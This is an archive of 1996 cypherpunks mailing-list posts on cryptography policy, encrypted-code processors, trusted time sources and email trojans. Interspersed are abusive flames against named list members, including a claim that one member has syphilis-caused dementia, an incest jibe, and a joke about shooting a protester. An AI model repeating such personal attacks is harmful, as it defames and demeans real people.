I've got a new draft available of my critique of US cryptography
policy and its impact on the future of the "information economy".
It summarizes comments I made to a recent meeting of the Computer
and Communications Industry Association, and is an updated version
of testimony I gave to the Senate commerce committee earlier this
year.

Postscript is at ftp://ftp.research.att.com/dist/mab/policy.ps
ASCII text is at ftp://ftp.research.att.com/dist/mab/policy.txt

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Thu, 19 Dec 1996 13:18:15 -0800 (PST)
Subject: Phil Zimmermann interviewed by Brock Meeks on ISP-TV
Message-ID: <199612192127.QAA06360@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: 

MEEKS UNFILTERED
WITH PHIL ZIMMERMANN
DECEMBER 25, 1996

Few men have influenced the face of public cryptography in this decade
as much as Phil Zimmermann, creator of the PGP encryption software
program and Chairman of the Board and Chief Technical Officer of the
Pretty Good Privacy corporation. 

Public cryptography, however, is more than just clever software.  It has
become a battleground for individual privacy and the role of the
government in having access to private communications.  For three
years,  Zimmermann was the target of a criminal investigation by the US
Customs Service, who assumed that United States munitions export laws
were broken when PGP spread outside the US. The investigation was
finally closed in January 1996, without any charges being filed.  Far
from being silenced, Zimmermann is now a respected voice for Netziens
and privacy advocates, frequently called upon by the media and Congress
for his views.

Please join ISP-TV and "Meeks Unfiltered" on December 25, 1996, at 8 PM
ET for a 30 minute interview between Brock N. Meeks, publisher of
CyberWire Dispatch, and Phil Zimmermann. We'd like to call it our
Christmas gift to the Net. 

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network.

To obtain Enhanced CU-SeeMe software, go to:

	http://goliath.wpine.com/cudownload.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Durbin <jed@poisson.com>
Date: Thu, 19 Dec 1996 16:37:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "I've Always Wondered..."
Message-ID: <3.0.1.32.19961219164104.0068de98@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri Vulis KOTM (dlv@bwalk.dm.com)
Thu, 19 Dec 96 09:50:27 EST wrote:

Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> On 10 Dec 1996, Secret Squirrel wrote:


> > > Still, this brings up an interesting point: Considering the special
> > > abilities of many of the principals here, is there something especially
> > > tasty in store for those net predators who spam this list?

> > > I've always imagined something _very_ special happens to their accounts,
> > > but I may just be a hopeless romantic, I dunno...

> > > If not, why not?

> > Even c'punks are busy at times.

> He he he. Clearly, "cypher punks" like Paul Bradley, Ray Arachalian, and
> Timmy May suffer from too having too much free time. Idle minds are the
> root of sexual perversion or some such.

Regulars of the Cypherpunk mailing list would be well advised to pay no 
attention to Dimitri Vulis who is in the latter stages of dementia caused 
by the syphillus he contracted from his wife Marina. How sad.

Of course, in his rare lucid moment, he lies just for fun. So, enjoy. :)

jd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven Chanyi" <SChanyi@Rogers.Wave.ca>
Date: Thu, 19 Dec 1996 17:26:45 -0800 (PST)
To: dagmar@edge.net>
Subject: Re: Ahem... 'virus'?
In-Reply-To: <3.0.32.19961219181215.006d68a8@edge.net>
Message-ID: <199612200135.RAA09574@aphex.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 19 Dec 1996 18:33:23 -0600
> To:            cypherpunks@toad.com
> From:          Dagmar the Surreal <dagmar@edge.net>
> Subject:       Ahem... 'virus'?

> Let's get a few things straight here before we go any further...  I field
> enough calls from the clooless at work trying to warn me about getting...

And you call them clueless?!  One thing to keep in mind... the ignorant are 
usually aware of their ignorance, the stupid, well... 

>... 2. How many of you people are using Microsloth Internet Mail?  It was
> mentioned a LONG time ago (I think here, in fact) that there was a major
> mental lapse on the part of the programmers when designing it because
> single-clicking a piece of mail will view it, while DOUBLE-CLICKING the
> mail will execute it (and any attached files!)....

And just like the clueless ones who fall for "Good Times" memos, you've fallen 
for some misinformation yourself. Single clicks in MS Internet Mail allow you 
to view the contents in the preview window - without opening or executing any 
attachments, while double clicking opens the message in it's own window - again 
without opening or executing any attachments. Try it a couple of times and 
you'll see for yourself. Just because you "heard it on the internet" does not 
make it fact!

>... their computer is completely kaput, or sitting in a shop waiting for
> someone like me to wipe the hard drive and reinstall everything...

What an absolutely horrifying thought!!

> Dagmar the Surreal (not actual size)
> "The Internet is Full.  Go Away."

To the former I suggest you change surreal to unreal, and as for the latter - 
you might consider taking your own advice.
Steven :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 19 Dec 1996 10:51:01 -0800 (PST)
To: "parents -you know who you are" <cypherpunks@toad.com>
Subject: Nuke the Whales!
In-Reply-To: <32B96006.13B0@gte.net>
Message-ID: <199612191853.LAA06104@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

blanc:

        you know, the last time one of them fuzzy weird colored things, 
    you know, the kind which is always crawling around the edge of any 
    gathering with stick signs and chanting, ...well, the other day one 
    them things accidently crossed my sights, and my whole trigger hand 
    went into an involuntary spasm.  

        ...well, the judge he told me to take my medication and 
    dismissed the charges.  As I thanked the judge and reminded him of 
    the meeting tonight, I remembered the fuzzy little thing's last 
    words: "...Tax the Rich." 

        ...you know, that fuzzy little thing really looked like that 
    city slicker flatlander what up here last month --Dale or somethin' 
    like it! 

        I did not quite understand the significance of that, but I 
    thought to myself: 

            "oh, yeah, that's right: 'Nuke the Whales'."

        --just more words from attila
  ==
  "Expecting the world to treat you fairly 
    because you are a good person 
    is a little like expecting the bull 
    not to attack you because you are a vegetarian." 
        --Dennis Wholey

    ------------------ original messsage ------------------------  

In <32B96006.13B0@gte.net>, on 12/19/96 
   at 07:32 AM, Dale Thorn <dthorn@gte.net> said:

::blanc wrote:
::> From:   Dale Thorn, who hasn't a clue
::> [on why the cpunks of late haven't discussed children's point of view]: >        
::Not lately?  And why is that?

::> Don't know, Dale.   Would everyone please send a message to Dale, >
::explaining why you haven't been discussing this?

::If all you want to be is an asshole, why do you bother with me?
::Surely you could pick a more "respected" target, yes?
::Looks like you:
::1. Don't have anything to do, and
::2. Feel insecure, and
::3. Feel inferior to me (wonder why), and
::4. Don't have any real answers.

::> [on the possibility that abused children might be helped by the uses of >
::encryption]: How is an abused child going to be helped by encryption?

::> Why are you on this list, Dale?

::To get non-answers from ignorants like yourself, I guess.

::> [on why, as I said, "empathy with children is not borne of government, but
::> of a normal state of mind"]:
::>         That's just rhetoric.  What normal state of mind?

::> Takes one to know one, Dale.

::I hope you're saying that I'm not on the same wavelength as you and *certain*
::other c-punks.  I feel better already.

::> [on going out to alt.philosphy.objectivism to evoke detailed discussions of
::> pertinence to his interest in benefitting from government programs]: >        
::In other words, if it doesn't offer something for me,
::>         the selfish adult, I don't wanna hear it.

::> I'm not *obliged* to hear, it Dale.

::Yeah, but you're obliged to partake one way or the other.
::Ya' know, you and a few other people whine a lot about government intrusion
::this or that (when you take your head out of the sand momentarily), but like
::selfish little children, you cover your ears when the news is unpleasant,
::like that's going to make a difference.

::Maybe if you got off your ass and did something worthwhile for society,
::things would really change for the better.  But I won't hold my breath.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrmOYr04kQrCC2kFAQFITAQAtPLtCDijDmgQUnmnbfr7nHs9C9u89v7G
eiwddxrUiSaupIf9lqQiAt6x6jbuYE+ihTREnMXJypCiN/tPpPc72DVjEoJ3efxs
8T/jpgjPt1wyWfqFI76zxbyI7nXKCcpwVdX0eK0UniuxHb9MBRjsZxjRIc299QCI
ZYNqmUbKHYQ=
=LDSN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vangelis <vangelis@qnis.net>
Date: Thu, 19 Dec 1996 18:58:39 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Code+Data separation
In-Reply-To: <v02140b01aedf4fba9ec3@[192.0.2.1]>
Message-ID: <32B9F4F9.7174@qnis.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
> Are there any modern processors which keep the code and data separated?

I dunno about processors which make that distinction, but it can be done
in software using page-protection features of the Intel CPU.  Under DPMI
for DOS and I would think somehow under Windows, the DATA segment can be
specified as loading into a seperate page/selector from the code (Im a
little hazy on the specifics), and that page then marked essentially as
"read only".

I think this was designed to make software more crash-resistant though,
not hack-resistance.  There's probably many ways to circumvent this
(explicity changing the access to that page, tricking the VMM into
swapping that page out to disk, then editting the swap file while it's
out there, etc).
-- 
Vangelis <vangelis@qnis.net> /\oo/\
Finger for public key. PGP KeyID 1024/A558B025
PGP Fingerprint AE E0 BE 68 EE 7B CF 04  02 97 02 86 F0 C7 69 25
Life is my religion, the world is my altar.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dagmar the Surreal <dagmar@edge.net>
Date: Thu, 19 Dec 1996 16:26:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ahem... 'virus'?
Message-ID: <3.0.32.19961219181215.006d68a8@edge.net>
MIME-Version: 1.0
Content-Type: text/plain


Let's get a few things straight here before we go any further...  I field
enough calls from the clooless at work trying to warn me about getting the
'Good Times Virus' in my email without having to worry about yet another
meme floating around about email virii.

1. Can anyone show that the .com file replicates?  It MUST reproduce itself
to be called a virus last time I checked.  It looks like a trojan horse to me.

2. How many of you people are using Microsloth Internet Mail?  It was
mentioned a LONG time ago (I think here, in fact) that there was a major
mental lapse on the part of the programmers when designing it because
single-clicking a piece of mail will view it, while DOUBLE-CLICKING the
mail will execute it (and any attached files!).  Most people double-click
EVERYTHING in Windoze, and this is why it nailed so many people.  I'm
surprised I hadn't seen this done sooner.

If you think it only got a few of the M$IM users, think again.  I'll bet
there's a LOT of them out there who are 'suffering in silence' because
their computer is completely kaput, or sitting in a shop waiting for
someone like me to wipe the hard drive and reinstall everything.  Please,
if there's going to be another damn meme about email virii, let it NOT be
from a list I consider to be at least a LITTLE more enlightened than the
hordes of AOL (l)users out there.
----------
Dagmar the Surreal (not actual size)
"The Internet is Full.  Go Away."

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzK50XQAAAEEAMoJsT9Rwbd28VUGhag2fOl+QrTnltqHrN2/7CBMy6kcnaba
8j3HIsNY6NzE/62iV67n6uCTlt6r3/ZosZL4RXYerH06bDOAfWZ6AYn6d0OO+vgi
sghnFXiUfknU0h7A88R7z4uRRpZNkU0NXL/svZjrL+cOiMRnQUAqcwqI8ynFAAUR
tCREYWdtYXIgdGhlIFN1cnJlYWwgPGRhZ21hckBlZGdlLm5ldD4=
=34r7
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danalogi@videotron.net (Fred N.)
Date: Thu, 19 Dec 1996 10:43:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: thread?
Message-ID: <32bc8d7f.7574421@relais.videotron.net>
MIME-Version: 1.0
Content-Type: text/plain


can we read this thread as a newsgroup somehwre?

or it's avaible only as remail?

fred.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 19:15:07 -0800 (PST)
To: Ben Byer <root@bushing.plastic.crosslink.net>
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b02aedfb5d9a7f2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:18 PM 12/19/1996, Ben Byer wrote:
>> At the last meeting references were made to processors which only
>> execute encrypted code.  Decryption occurs on chip.
>>
>> If each chip has a unique public/secret key pair, and executes
>> authenticated code only, there are some interesting implications.

> Let's see... What about this scenario:

> Alice gets a contraband copy of PGP 4.0 off the Internet.  Since the
> public-key algorithm is publicized so that people can encrypt software
> to a chip, PGP 4.0 has the ability to encode/decode/generate keys for
> the chip.  Alice generates a public key/private key pair 0x12345678,
> in software.  Alice goes to www.microsoft.com and orders Office '99
> online, and tells Microsoft "Hi, my name is Alice, my credit card
> number is 31426436136778 and my PGPentium's public key is 0x12345678."

> Microsoft unwittingly sends Alice a copy encrypted to 0x12345678, for
> which she has the private key to.  Alice decrypts Office '99, and
> reencrypts it with public key of her PGPentium, as well as the keys f
> all her friends.

The software vendor would be wise to check that the public key was
legal.  It would be a simple matter for the manufacturer to publicize
all public keys that had been installed on chips.

> Does the authentication defeat this?

I'm sort of waving my hands around when I say "authentication".

One approach is for the manufacturer to authenticate software submitted
by approved vendors.  The vendors are then tasked with encrypting it
for the correct processor.

> Our computers would only run software from Microsoft?  Scary.

There are all sorts of nifty deals that could be made.  Microsoft
could commission a special run of the processors which only run
Microsoft approved software.  Machines using these processors could
be given away or sold at a steep discount.

You could also timestamp the software so that it only runs for a given
length of time.  This will encourage people to upgrade regularly.  ;-)

The processors could also support metering.  The processor could support
some sort of API for the software to tell it how many computrons had
been used and stop it from running after they run out.  This means
that light users or evaluators of software pay relatively low prices
while heavy users pay high prices.  This is a great deal for all
concerned.  Right now software vendors try to do this with clever deals,
but it's crude at best.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Thu, 19 Dec 1996 19:32:32 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: "Cypher punks'" sexual preferences
In-Reply-To: <DX97yD5w165w@bwalk.dm.com>
Message-ID: <199612200356.TAA25114@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


I am gay.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 19 Dec 1996 19:46:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <1.5.4.32.19961220040241.003a6284@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 PM 12/11/96 -0800, "Timothy C. May" <tcmay@got.net> wrote:
>Consider a "race credential" offered by some entity. 
..
>(Why some groups might want this is left as an exercise for the reader.
>Perhaps a less-inflammatory example (to some of the sensitive amongst you)
>might be that some women want to interact in "women only" forums--a clear
>case of discrimination, no?--and may want a "gender bit" avaiable to
>display as a credential.)

I've already tried to subscribe to a forum (at the liberal Utne reader!)
where I was rejected because they currently had more subscribers
who identified themselves as "male" than as "female", and they wanted
to maintain a balance.  And certainly "US Citizens Only" sites
are common - nationalism is just as ugly and stupid as racism,
and far more likely to be enforced with ID requirements;
I've heard that in less civilized parts of the world you're actually
required to carry government-issued ID cards to walk down the street
or fly on airplanes.

Another problem is that "nationalist credentials" made hide other data,
such as a race bit, a Jewish bit, a don't-ask-out-loud-don't-tell bit,
a suspected-Commie bit, a check-FBI-files-first bit, etc.  The subliminal 
channels in DSS are the best known method for doing this, but it's probably
possible to do something similar even using blind signatures, especially
if there are multiple keys or timestamp fields.  For example, they could
use different signature keys that are supposedly just "signed at the
New York/LA/Langley/Holtsville/SF/DC office" or "signed 4/1/97 4:20pm".

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#     (If this is a mailing list, please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 19 Dec 1996 20:05:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b02aedfb5d9a7f2@[192.0.2.1]>
Message-ID: <v03007801aedfc6824d72@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:34 PM -0800 12/19/96, Peter Hendrickson wrote:

>You could also timestamp the software so that it only runs for a given
>length of time.  This will encourage people to upgrade regularly.  ;-)

Or to reset their clocks. Which is what many of us do when software is
about to "expire."

(The issue of enforcing "digital time delays" is an interesting one.
Usually this necessitates some variant of "beacons," presumably on the Net,
as the local clock can of course not be trusted or counted upon to be
accurate. I wrote a couple of articles on this several years ago...I'll see
if I can find them if there's interest.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 20:49:04 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b00aedfceb8bb0f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:31 PM 12/19/1996, Timothy C. May wrote:
>At 7:34 PM -0800 12/19/96, Peter Hendrickson wrote:
>> You could also timestamp the software so that it only runs for a given
>> length of time.  This will encourage people to upgrade regularly.  ;-)

> Or to reset their clocks. Which is what many of us do when software is
> about to "expire."

You are right that this only works in instances where the customer just
needs a little prodding to get the upgrade and not in instances where
the customer might put up with significant inconvenience to avoid it.

However, why not use "beacons"?  The clock could have a built-in timer
that needs to be reset once a month from an authenticated source.  This
assumes the presence of net connectivity, but that's not a terrible
assumption.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Byer <root@bushing.plastic.crosslink.net>
Date: Thu, 19 Dec 1996 18:14:54 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b00aedf4a134af2@[192.0.2.1]>
Message-ID: <199612200218.VAA00383@bushing.plastic.crosslink.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 
> At the last meeting references were made to processors which only
> execute encrypted code.  Decryption occurs on chip.
> 
> If each chip has a unique public/secret key pair, and executes
> authenticated code only, there are some interesting implications.

Let's see... What about this scenario:

Alice gets a contraband copy of PGP 4.0 off the Internet.  Since the
public-key algorithm is publicized so that people can encrypt software
to a chip, PGP 4.0 has the ability to encode/decode/generate keys for
the chip.  Alice generates a public key/private key pair 0x12345678,
in software.  Alice goes to www.microsoft.com and orders Office '99
online, and tells Microsoft "Hi, my name is Alice, my credit card
number is 31426436136778 and my PGPentium's public key is 0x12345678."

Microsoft unwittingly sends Alice a copy encrypted to 0x12345678, for
which she has the private key to.  Alice decrypts Office '99, and
reencrypts it with public key of her PGPentium, as well as the keys f
all her friends.

Does the authentication defeat this?  Our computers would only run
software from Microsoft?  Scary.

- -- 
Ben Byer    root@bushing.plastic.crosslink.net    I am not a bushing

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMrn3V7D5/Q37XXHFAQFuVAMAg90hbta98fduPUdvneYYbfZe4v+9fsmc
rSyYYStamC/mX8Mr2BRJVtNlOoWLkALhfPcnF0tKL5cVBTgufVlZRyJBc5KypkeZ
q/hyIupaA4aETwALBlEdZ+3k1eOKiE6L
=nGsN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 19 Dec 1996 20:54:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b00aedfceb8bb0f@[192.0.2.1]>
Message-ID: <v03007800aedfd2604767@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:08 PM -0800 12/19/96, Peter Hendrickson wrote:
>At 8:31 PM 12/19/1996, Timothy C. May wrote:
>>At 7:34 PM -0800 12/19/96, Peter Hendrickson wrote:
>>> You could also timestamp the software so that it only runs for a given
>>> length of time.  This will encourage people to upgrade regularly.  ;-)
>
>> Or to reset their clocks. Which is what many of us do when software is
>> about to "expire."
>
>You are right that this only works in instances where the customer just
>needs a little prodding to get the upgrade and not in instances where
>the customer might put up with significant inconvenience to avoid it.
>
>However, why not use "beacons"?  The clock could have a built-in timer
>that needs to be reset once a month from an authenticated source.  This
>assumes the presence of net connectivity, but that's not a terrible
>assumption.

I mentioned "beacons" in the portion of my message you did not quote here.

As for why they are not being used, they don't exist.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 21:13:07 -0800 (PST)
To: Ben Byer <root@bushing.plastic.crosslink.net>
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b02aedfcfd6fe35@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 12/19/1996, Ben Byer wrote:
> The manufacturer is going to publish a list of ALL of the public keys?
> We're talking one key per chip, right?  Isn't that an AWFUL lot of
> keys, like, in the millions range?

Let's say each key is 2048 bits and there are 10 million processors.
That's only 2.38 gigabytes, or under $1000.  Easy enough to put on
the Web or on a set of CD-ROMs.

> Also... with a few million possible keys like this, all you need to do
> is to either guess or factor just one of them.

Yes, my working assumption is that factoring is very hard.

>>> Does the authentication defeat this?

>> I'm sort of waving my hands around when I say "authentication".

>> One approach is for the manufacturer to authenticate software submitted
>> by approved vendors.  The vendors are then tasked with encrypting it
>> for the correct processor.

> I'm not sure the "approved" bit would go over too well... one idea
> would be to license the compiler writers, who would build the
> encryption into compilers.  It's still not horribly great, but
> better.

You have to have the "approved" message so that you don't get
viruses and to thwart piracy in case anybody did manage to get the
secret key out of the chip.

How well it goes over depends entirely on how much you pay for the
software.

>>> Our computers would only run software from Microsoft?  Scary.

>> There are all sorts of nifty deals that could be made.  Microsoft
>> could commission a special run of the processors which only run
>> Microsoft approved software.  Machines using these processors could
>> be given away or sold at a steep discount.

> Right; the only reason I could see people using this would be for
> economical reasons.

And one would expect piracy-proof software to be very inexpensive.  Most
people who pay for software have little sympathy for those who don't.

>> You could also timestamp the software so that it only runs for a given
>> length of time.  This will encourage people to upgrade regularly.  ;-)
>> The processors could also support metering.

> Right; once the user loses control of what he's running, then you can
> pretty much do anything you want as far as metering goes.

Right you are - see below.

> ObGAK question:  Would this be exportable?  I mean, you could be
> encrypting god knows WHAT into those .exe's...  Key escrow?  How would
> they get the key?!?  I can see the headlines, "Key Escrow Database
> Leaked to Pirate Firm"... :)

While I am certainly not a lawyer, and even the lawyers can't tell
you what is legal to export, I would guess that Big Brother would be
delighted with the manufacturers of this processor.  It can't be
used to encrypt communications, only to decrypt software.  What is
more, you could control the physical processors so that exportable
processors accept a different authentication key.

Then, the manufacturer of the processor can take care not to authenticate
any privacy enhancing programs for the export version of the processor.

Free speech and constitutional issues evaporate because the processors
are physical devices and not expressions of ideas.

Even "better", not very many organizations in the world can afford the
fab lines to manufacture a state of the art processor.  So, if the
G-7 countries are brought onto the reservation, it would be feasible
to forbid all free processors.

Peter Hendrickson
ph@netcom.com

P.S. Did you hear?  For Christmas Big Brother is raising the chocolate
ration from 30g to 20g!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 18:25:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Houghton-Mifflin wants spam in exhange for publicity
In-Reply-To: <Pine.LNX.3.95.961219094339.11068E-100000@kinch.ark.com>
Message-ID: <1kR8yD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Kinchlea <security@kinch.ark.com> writes:

> In defence of my sister, I do not know how she managed to add
> cypherpunks to her reply, I certainly didn't send it to the list, but
> she has used email for a total of 1 week to date -- shit happens and we
> all learn and make mistakes.

You've been porking your own sister? Man, you're SICK.

> I will/do agree that cypherpunks was an inappropriate place to send the
> spam to begin with.

How about some GIFs?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 19 Dec 1996 21:18:19 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
Message-ID: <v02140b03aedfd5494638@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:20 PM 12/19/1996, Timothy C. May wrote:
>> However, why not use "beacons"?  The clock could have a built-in timer
>> that needs to be reset once a month from an authenticated source.  This
>> assumes the presence of net connectivity, but that's not a terrible
>> assumption.

> I mentioned "beacons" in the portion of my message you did not quote here.

Gack!

> As for why they are not being used, they don't exist.

Here's how I would do it.  When the processor wants to update its
clock, it generates a random number and encrypts it for the trusted
time source.  The trusted time source decrypts its message to get
the random number.  It timestamps it, encrypts it, and sends it
back.

This means you can't replay old time messages to keep using your
old software.

Is it possible to have a little clock and rechargeable battery on
a chip?  If so, then this technique should be easy to use.

If not, then the processor can count the number of cycles it runs and
use that as an approximate means of deciding when to check the time.

Or, it could demand a time update every time it is power cycled.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 19 Dec 1996 21:48:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Code+Data separation
In-Reply-To: <v02140b01aedf4fba9ec3@[192.0.2.1]>
Message-ID: <v03007804aedfd804957e@[204.31.236.106]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 PM -0800 12/19/96, Peter Hendrickson wrote:
>Are there any modern processors which keep the code and data separated?

Many modern processors keep separate L1 caches for code and data.  Sparc
architecture requires a special instruction to say, "I have just used data
operations to change this part of the program."  I assume that program
fetchers and linkers must use this instruction.

Keeping separate main memory makes program loading and in-memory dynamic
linking hard.  The linker's data is the processor's program.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Thu, 19 Dec 1996 18:34:32 -0800 (PST)
To: Matt Blaze <mab@research.att.com>
Subject: Re: "Cryptography Policy and the Information Economy" draft available
Message-ID: <3.0.32.19961219214823.00a62160@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:11 PM 12/19/96 -0500, Matt Blaze wrote:
>I've got a new draft available of my critique of US cryptography
>policy and its impact on the future of the "information economy".
>It summarizes comments I made to a recent meeting of the Computer
>and Communications Industry Association, and is an updated version
>of testimony I gave to the Senate commerce committee earlier this
>year.
>
>Postscript is at ftp://ftp.research.att.com/dist/mab/policy.ps
>ASCII text is at ftp://ftp.research.att.com/dist/mab/policy.txt

Matt,

	I liked your draft except for one thing.  You never mentioned
that the government has never established a legal right to access the
cleartext of an encrypted communication or file.  Perhaps the most
severe flaw in the GAK proposals is that I as a citizen wish
to attempt to keep secrets from the government and to force them to
take me to court to get a judge to demand that I release those
secrets -=- while their proposals are trying to prevent me from
even attempting such.

 - Carl

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrn+WlQXJENzYr45AQFrFgQAp2jfB3EOLJoOKHIpTne7D4cwL1KzPcRg
VoELRWDGS1RkgK5cSgLl9ASWZ7TdcMRiQUbDPMoffMi3UWlfIpomdsHq+E4HE/U+
6CS+cpUfw/eSwBYkotCfETMAHymknu/o06QYfBX0TQsN/2XOC52xXEd9Nb/8xjUW
c4RETw8Os8A=
=nkcy
-----END PGP SIGNATURE-----


+------------------------------------------------------------------+
|Carl M. Ellison  cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc.                      http://www.cybercash.com/    |
|207 Grindall Street   PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Baltimore MD 21230-4103  T:(410) 727-4288  F:(410)727-4293        |
+------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 19 Dec 1996 21:48:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b00aedf4a134af2@[192.0.2.1]>
Message-ID: <v03007805aedfd934dcf4@[204.31.236.106]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 PM -0800 12/19/96, Peter Hendrickson wrote:
>If each chip has a unique public/secret key pair, and executes
>authenticated code only, there are some interesting implications.
>
>Software piracy becomes difficult, if not impossible.  Code is sold
>on a processor by processor basis.  Code for a different physical
>processor cannot be decrypted or executed.

This makes backup hard.  That is the rock the routine copy protection hit
